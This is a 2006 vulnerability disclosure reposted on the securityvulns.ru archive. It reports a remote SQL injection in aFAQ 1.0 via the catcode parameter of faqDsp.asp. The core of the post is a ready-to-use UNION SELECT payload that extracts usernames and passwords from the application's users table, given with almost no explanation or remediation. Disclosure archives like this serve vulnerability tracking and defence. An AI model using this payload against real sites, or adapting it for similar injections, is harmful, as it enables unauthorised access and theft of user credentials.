Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Acronym Mod  v0.9.5  Remote SQL Injection Vulnerability

  ASPTicker 1.0 (admin.asp) Remote Login ByPass SQL Injection Vulnerability

  Title   :  WYWO - InOut Board 1.0 Multiple Vulnerabilities

  x-news 1.1 Password Disclosure Vulnerability

From:ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date:31.12.2006
Subject:aFAQ 1.0 (catcode) Remote SQL Injection Vulnerability

*******************************************************************************
# Title   :  aFAQ 1.0 (catcode) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.alanward.net
# $$      :  Free
*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//faqDsp.asp?catcode=[SQL]

Example:

//faqDsp.asp?catcode=-1%20union%20select%20username,password,0,0,0,0,
0,0,0,0,0,0,0,0%20from%20users

[[/SQL]]

""""""""""""""
"""""""
# ajann,Turkey
# ...

# Im not Hacker!

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod
 



Rating@Mail.ru